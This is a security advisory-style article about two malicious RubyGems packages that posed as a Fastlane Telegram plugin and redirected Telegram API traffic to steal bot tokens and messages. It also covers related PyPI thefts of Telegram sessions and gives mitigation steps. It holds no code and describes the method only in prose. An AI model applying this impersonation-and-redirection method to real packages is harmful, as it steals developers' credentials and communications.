Malicious RubyGems Impersonate Fastlane to Hijack Telegram API Data

Two malicious RubyGems packages have been discovered masquerading as popular Fastlane CI/CD plugins, designed to intercept and exfiltrate Telegram API data. The packages, identified as fastlane-plugin-telegram-plus and fastlane-plugin-telegram_pro, were found redirecting API requests to attacker-controlled servers, compromising bot tokens and message content¹. This incident coincides with Vietnam’s Telegram ban, suggesting targeted exploitation of developers in the region.

Technical Analysis of the Attack

The malicious packages were uploaded to RubyGems by threat actor Bùi Nam, who configured them to proxy Telegram API requests through intermediary servers¹. When developers integrated these gems into their Fastlane workflows, the packages would:

Intercept sendMessage API calls to Telegram’s official endpoint (api.telegram.org)
Redirect traffic to domains controlled by the attacker
Log sensitive data including bot tokens, chat IDs, and message content

Security researchers identified the packages mimicking the legitimate fastlane-plugin-telegram (version 0.1.4), which hasn’t been updated since January 2022⁵. The malicious versions added obfuscated code to the TelegramAction class, modifying the API endpoint through environment variable injection.

Broader Context of Telegram API Abuse

This incident follows a pattern of Telegram API exploitation observed since 2024. In July 2024, Forcepoint documented phishing campaigns using Telegram’s API to exfiltrate credentials via JavaScript-injected login pages². Attackers logged victim data including email, password, IP addresses, and userAgent strings through Telegram bot APIs.

Similar tactics were observed in PyPI packages (Quicolor, QuickColors, ColorYi) that stole Telegram Desktop’s tdata folder, containing session tokens capable of bypassing two-factor authentication³. These stolen accounts were later sold on dark web marketplaces for $5-$400, depending on account privileges and Telegram Stars currency balances.

Detection and Mitigation Strategies

Organizations using Fastlane with Telegram integration should immediately:

Verify installed packages against the official RubyGems repository
Check for unexpected network connections to non-Telegram domains
Rotate all Telegram bot tokens that may have been exposed
Monitor for unauthorized API calls using Telegram’s “Active Sessions” feature

RubyGems has since removed the malicious packages, but developers should remain vigilant for similar typosquatting attempts. The legitimate fastlane-plugin-telegram remains safe to use, though developers should consider auditing its source code given its age⁵.

Security Implications

This attack demonstrates how CI/CD toolchains can become vectors for supply chain compromises. The incident shares characteristics with previous attacks against PyPI and npm ecosystems, where attackers:

Platform	Attack Method	Data Targeted
RubyGems	Typosquatting legitimate Fastlane plugins	Telegram API credentials
PyPI	Malicious color utility packages	Telegram session tokens
npm	Compromised maintainer accounts	Environment variables

The incident underscores the need for robust package verification processes in development workflows, particularly when handling sensitive API credentials.

Conclusion

This RubyGems campaign represents a targeted attack against developers using Telegram’s API through Fastlane. While the immediate threat has been mitigated through package removal, the techniques used suggest ongoing risks to CI/CD pipelines. Organizations should implement strict controls over third-party dependencies and monitor for anomalous API activity, particularly when using services like Telegram that handle sensitive communications.